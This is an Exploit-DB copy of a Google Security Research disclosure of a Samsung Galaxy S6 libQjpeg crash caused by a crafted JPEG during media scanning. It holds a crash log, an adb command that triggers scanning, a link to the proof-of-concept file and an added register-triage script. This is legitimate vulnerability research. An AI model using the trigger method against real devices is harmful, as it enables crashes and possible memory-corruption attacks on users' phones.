
Samsung Galaxy S6 - libQjpeg DoIntegralUpsample Crash

Date: 03 Nov 2015
Reported by: Google Security Research
Type: exploitdb
Link: www.exploit-db.com

Samsung Galaxy S6 libQjpeg DoIntegralUpsample crash during media scanning

Code
Source: https://code.google.com/p/google-security-research/issues/detail?id=498

The attached JPEG, upsample.jpg, can cause memory corruption when media scanning occurs:

F/libc    ( 8600): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x206e6f69747562 in tid 8685 (HEAVY#0)
I/DEBUG   ( 2956): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG   ( 2956): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.0.2/LRX22G/G925VVRU2AOF1:user/release-keys'
I/DEBUG   ( 2956): Revision: '10'
I/DEBUG   ( 2956): ABI: 'arm64'
I/DEBUG   ( 2956): pid: 8600, tid: 8685, name: HEAVY#0  >>> com.samsung.dcm:DCMService <<<
I/DEBUG   ( 2956): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x206e6f69747562
I/DEBUG   ( 2956):     x0   0000007f8cef2ab0  x1   0000000000000002  x2   0000007f8cef2ab0  x3   0000007f8ce5a390
I/DEBUG   ( 2956):     x4   0000007f8cef28d0  x5   3d206e6f69747562  x6   0000007f8cef29f0  x7   42e34ca342e32177
I/DEBUG   ( 2956):     x8   42e390a242e37199  x9   42dfe02f42debc0f  x10  42e06c3442e03665  x11  42e0afd542e08c24
I/DEBUG   ( 2956):     x12  42e1070042e0e62d  x13  42e1830842e146da  x14  42e1f53342e1add4  x15  00000000000014a4
I/DEBUG   ( 2956):     x16  0000007f9f0d6ae0  x17  0000007fa3e7e880  x18  0000007f8ce75c60  x19  0000007f8cebe000
I/DEBUG   ( 2956):     x20  0000000000000001  x21  0000007f8cebe000  x22  0000000000000001  x23  0000000000000000
I/DEBUG   ( 2956):     x24  0000000000000000  x25  0000000000000000  x26  0000000010000000  x27  0000007f8c5ff050
I/DEBUG   ( 2956):     x28  0000007f8ce77800  x29  000000000000001c  x30  0000007f9f09fff8
I/DEBUG   ( 2956):     sp   0000007f8d0fea20  pc   0000007f9f09e83c  pstate 0000000080000000
I/DEBUG   ( 2956): 
I/DEBUG   ( 2956): backtrace:
I/DEBUG   ( 2956):     #00 pc 000000000009b83c  /system/lib64/libQjpeg.so (WINKJ_DoIntegralUpsample+164)
I/DEBUG   ( 2956):     #01 pc 000000000009cff4  /system/lib64/libQjpeg.so (WINKJ_SetupUpsample+228)
I/DEBUG   ( 2956):     #02 pc 0000000000035700  /system/lib64/libQjpeg.so (WINKJ_ProgProcessData+236)
I/DEBUG   ( 2956):     #03 pc 0000000000041f08  /system/lib64/libQjpeg.so (WINKJ_DecodeImage+688)
I/DEBUG   ( 2956):     #04 pc 00000000000428d4  /system/lib64/libQjpeg.so (WINKJ_DecodeFrame+88)
I/DEBUG   ( 2956):     #05 pc 0000000000042a08  /system/lib64/libQjpeg.so (QURAMWINK_DecodeJPEG+276)
I/DEBUG   ( 2956):     #06 pc 000000000004420c  /system/lib64/libQjpeg.so (QURAMWINK_PDecodeJPEG+200)
I/DEBUG   ( 2956):     #07 pc 00000000000a4234  /system/lib64/libQjpeg.so (QjpgDecodeFileOpt+432)
I/DEBUG   ( 2956):     #08 pc 0000000000001b98  /system/lib64/libsaiv_codec.so (saiv_codec_JpegCodec_decode_f2bRotate+40)
I/DEBUG   ( 2956):     #09 pc 0000000000001418  /system/lib64/libsaiv_codec.so (Java_com_samsung_android_saiv_codec_JpegCodec_decodeF2BRotate+268)
I/DEBUG   ( 2956):     #10 pc 00000000000018ec  /system/framework/arm64/saiv.odex

To reproduce, download the image file and wait, or trigger media scanning by calling:

adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38612.zip
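
A triage aid for the crash log above, added here and not part of the original report: it parses the register dump and flags any register whose eight bytes are all printable ASCII, which during crash triage suggests that text or file data ended up where a pointer was expected. The function names are hypothetical; the sample lines are copied from the log on this page with the logcat prefix trimmed.

```python
import re

# Register lines copied from the crash log on this page (logcat prefix trimmed).
CRASH_LOG = """\
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x206e6f69747562
    x0   0000007f8cef2ab0  x1   0000000000000002  x2   0000007f8cef2ab0  x3   0000007f8ce5a390
    x4   0000007f8cef28d0  x5   3d206e6f69747562  x6   0000007f8cef29f0  x7   42e34ca342e32177
    x8   42e390a242e37199  x9   42dfe02f42debc0f  x10  42e06c3442e03665  x11  42e0afd542e08c24
"""

# General-purpose arm64 registers as debuggerd prints them: name, then 16 hex digits.
REG_RE = re.compile(r"\b(x\d{1,2})\s+([0-9a-f]{16})\b")
FAULT_RE = re.compile(r"fault addr 0x([0-9a-f]+)")


def parse_registers(log):
    """Return {register name: 64-bit value} from debuggerd register lines."""
    return {name: int(val, 16) for name, val in REG_RE.findall(log)}


def ascii_view(value):
    """Decode a 64-bit value as little-endian bytes; None unless all printable ASCII."""
    raw = value.to_bytes(8, "little")
    return raw.decode("ascii") if all(0x20 <= b <= 0x7E for b in raw) else None


def triage(log):
    """List (register, text, matches_fault_addr) for registers that hold printable text."""
    regs = parse_registers(log)
    m = FAULT_RE.search(log)
    fault = int(m.group(1), 16) if m else None
    findings = []
    for name, value in regs.items():
        text = ascii_view(value)
        if text is None:
            continue
        # In this log the fault address equals x5's low 56 bits, so compare on those.
        low56 = value & ((1 << 56) - 1)
        findings.append((name, text, fault is not None and low56 == fault))
    return findings


if __name__ == "__main__":
    for name, text, matches in triage(CRASH_LOG):
        print(f"{name}: {text!r} matches fault addr: {matches}")
```

On this log the only register flagged is x5, whose bytes read as the text `bution =` and whose low 56 bits equal the reported fault address.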
